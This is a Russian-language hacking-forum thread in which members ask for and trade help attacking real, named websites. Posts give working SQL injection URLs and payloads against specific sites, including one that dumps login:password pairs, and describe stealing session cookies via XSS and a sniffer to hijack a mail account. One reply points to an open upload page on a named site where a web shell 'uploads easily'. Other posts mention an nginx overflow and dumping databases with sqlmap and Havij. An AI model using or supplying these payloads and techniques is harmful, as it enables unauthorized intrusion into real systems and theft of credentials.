Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    Так проверьте же. Кука может быть не одна, может быть еще на одном домене, может быть привязка к ip. А скорее всего привязка к user-agent'у.
     
  2. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    Немного поэксперементировав я пришел к некому результату но всёже это ещё не результат...

    Залогинился в опере, заюзал xss , открыл сниифер - куки уже тут.
    Открываю фаерфокс и плагин в нем (Live http replay)
    мне нужен был именно он так как очень просто можно заменить все куки запроса

    Вобщем открываю главную, ловлю запрос , меняю в нем куки на те что пришли на сниффер, повторяю запрос и вижу что я типо залогинен с почты которая насамом деле открыта у меня в опере.
    Конечно же зайти на неё не удалось так как куки переданные плагином не сохранились в браузер.

    Переберал все возможные комбинации и оказалось что для этого хватит всего одной куки Mpop и страница также будет показывать что я якобы залогинен. :(

    А если куку Mpop просто сунуть в браузер и сохранить то она умрет и меня попросит ввести пассворд повторно.
     
  3. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Народ, помогите вывести таблицы..
    Code:
    http://bigtoys.com.ua/index.php?route=product/category&path=106+or+1+group+by+concat(version(),floor(rand(0)*%202))having+min(0)+or+1
     
  4. UXOR

    UXOR Member

    Joined:
    16 Aug 2013
    Messages:
    44
    Likes Received:
    7
    Reputations:
    6
    SELECT 1 from information_schema.tables group by concat((SELECT table_name from information_schema.tables limit 0,1),floor(rand(0)*2)) having min(0)
     
    1 person likes this.
  5. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    В Opencart скуля?
     
  6. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Там фильтруется нижнее подчеркивание.
     
    _________________________
    1 person likes this.
  7. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Старая. С бородой уже.
     
    _________________________
  8. zombak18

    zombak18 New Member

    Joined:
    2 Oct 2011
    Messages:
    34
    Likes Received:
    1
    Reputations:
    0
    В общем заюзал на одном сайте Nginx stack-based buffer overflow
    Он выдал вот такую инфу

    [​IMG]

    Как это можно использовать.. Для чего эти байты?
     
  9. sergei1105

    sergei1105 New Member

    Joined:
    15 Jan 2014
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    HTTP parameter pollution что за уязвимость?
     
  10. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Зайди в гугл, ввел HTTP parameter pollution.
    Открой первую вкладку http://raz0r.name/articles/http-parameter-pollution и прочитай.
     
    _________________________
  11. imprenko

    imprenko New Member

    Joined:
    9 Sep 2010
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    приветствую
    понять не могу что за база
    на "
    SearchEngineException: parsefql: Query Error: line 1:100: unexpected token:
    ,linguistics=off),boost=1000), not(*.swf), not(*filtertable*), not(*multimedia_layer_library*), not(*.flash.html), not(*.isng.*), not(*tabcontent*), not(*Search_Results*), not(*medialibrary*), not(*.ngrb.*), not(*media_library*), not(*.pid.*), not(*.redirect.*),filter(and(language:

    ")ORDER BY 1
    SearchEngineException: parsefql: Query Error: line 1:100: unexpected token: ORDER
    ")and(select null)
    SearchEngineException: parsefql: Query Error: line 1:111: unexpected token: null

    хелп..
     
  12. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    Посоветуйте пожалуйста нормальный гуи для sqlmap
    Особенно важна поддержка иньекций в куках
     
  13. reuvenmatbil

    reuvenmatbil New Member

    Joined:
    1 Sep 2012
    Messages:
    28
    Likes Received:
    4
    Reputations:
    0
    Подскажите пример реализации

    https://www.site.com/login

    POST

    PARAM: firstN=&lastN=

    DB: ORACLE

    c чего начать?
     
  14. UXOR

    UXOR Member

    Joined:
    16 Aug 2013
    Messages:
    44
    Likes Received:
    7
    Reputations:
    6
    В разделе ИЗБРАННОЕ смотрел?
     
  15. erwap

    erwap Member

    Joined:
    20 Sep 2012
    Messages:
    56
    Likes Received:
    16
    Reputations:
    0
    Почему, когда пытаюсь сдампить бд, некоторые поля сохраняются пустыми?
    Пробовал Havij и sqlmap
     
  16. UXOR

    UXOR Member

    Joined:
    16 Aug 2013
    Messages:
    44
    Likes Received:
    7
    Reputations:
    6
    Уверен,что там есть данные?ручками пробовал?
     
  17. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    А вы таки вообще уверены, что в записях с этими полями поля по факту не пустые? И какие у вас привилегии на системе?
     
  18. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Есть сайт со скулей
    Code:
    http://kerch.biz/news/view.php?id=-328+union+/*!select*/+1,2,3,concat%28login,0x3a,password%29,5,6+FROM+users+--+
    и админка но ни одна из учёток не подходит. Расскажите, в чём подвог?

    2. Не подбирается кол-во столбцов.
    Code:
    www.tmk-group.com/structure.php?flr_id=179+and+1=0+order+by+1+--+
     
    #22958 Unknowhacker, 21 Jan 2014
    Last edited: 21 Jan 2014
  19. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126

    http://kerch.biz/upload.php
    Спокойно шелл грузится.
     
    _________________________
    1 person likes this.
  20. imprenko

    imprenko New Member

    Joined:
    9 Sep 2010
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    подскажите по базе SAP MaxDB
    не могу найти статей про это базу как скуль ижект делать в ней.
    блинд
     
Thread Status:
Not open for further replies.